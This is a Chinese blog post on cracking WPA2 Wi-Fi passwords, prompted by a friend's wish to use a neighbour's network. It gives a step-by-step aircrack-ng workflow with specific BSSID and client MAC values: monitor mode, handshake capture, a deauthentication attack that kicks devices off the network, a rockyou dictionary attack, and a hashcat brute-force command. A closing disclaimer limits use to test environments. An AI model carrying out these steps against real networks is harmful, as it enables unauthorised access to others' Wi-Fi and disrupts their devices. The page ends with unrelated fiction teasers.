记一次简单无线破解过程

废话

一个朋友临时来岛成出差,由于持续时间比较成,因此住在了自己家里。由于长时间在外面,因此家里没有网。
于是他跟我商量是否能够在附近找一个邻居的WIFI临时“借(po)用(jie)一(yi)下(ge)”,这种事情虽然作为一个安全从业人员这么做有点不地道。但由于自己从来没接触过这方面知识,因此自己搭一个环境测试了一下。 废话少说一下简述过程。


简述

本次测试过程中涉及到工具如下:
airmon-ng:这个工具比较常见工具详细介绍。主要功能有网络侦测,数据包嗅探等功能。
airodump-ng:此工具主要用于用户抓取握手包
aireplay-ng:主要用户强制现有网络设备重发握手包。
aircrack-ng:用于破解握手包
其他辅助工具:hashcat

开始测试

  1. 断开wifi网络链接,确认使用的网络接口
    sudo airmon-ng
查看网络接口

如果在运行此命令后为发现interface,则说明现有无线网卡不支持监听模式,需要购买支持监听模式的网卡如RTL8187等。

  1. 开启监听模式
    sudo airmon-ng start wlan0
开启网络监听

执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。

开启监听后的网卡名称
  1. 查看网络状态
    airodump-ng wlan0mon
能搜到的ssid
  1. 开始抓包
    airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
  • -c指定频道id
  • --bssid 指定路由器bssid
  • -w 保存数据包位置
抓取数据信息

由于路由器只是在重新链接是才会发送握手包,因此需要将以连接设备重新连接。

  1. 强制踢出设备
    通过aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
    sudo aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
  • -0表示发起deauthentication攻击
  • -a指定无线路由器BSSID
  • -c指定强制断开的设备

强制踢出成功

抓包成功后ctrl+C即可结束抓包。
停止监听模式
airmon-ng stop wlan0mon

  1. 开始跑包
    aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
  • -a2代表WPA的握手包
  • -b指定要破解的wifi BSSID。
  • -w指定字典文件
  • 最后是抓取的包

明文密码

跑密码时可以通过GPU的运算力破解各种不同算法的hash值,可以通过下载hascat进行破解。
在破解前需要将cap文件转换为.hccap。
转换方法如下:
aircrack-ng file.cap -J out.hccap
在转换时如果报错,可能会是未抓到握手包,通过错误提示可知到。

  1. hashcat跑包
    hashcat64.exe -m 2500 -a3 A8_handshake.cap.hccap ?d?d?d?d?d?d?d?dpause
  • -m 2500:破解 WPA2 密码
  • -a3:暴力破解
  • A8_handshake.cap.hccap:握手包文件

文档中部分内容参考网络其他资料,文中涩及到的内容仅在测试环境中使用,请勿进行网络攻击。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,884评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,755评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,369评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,799评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,910评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,096评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,159评论 3 411
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,917评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,360评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,673评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,814评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,509评论 4 334
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,156评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,882评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,123评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,641评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,728评论 2 351

推荐阅读更多精彩内容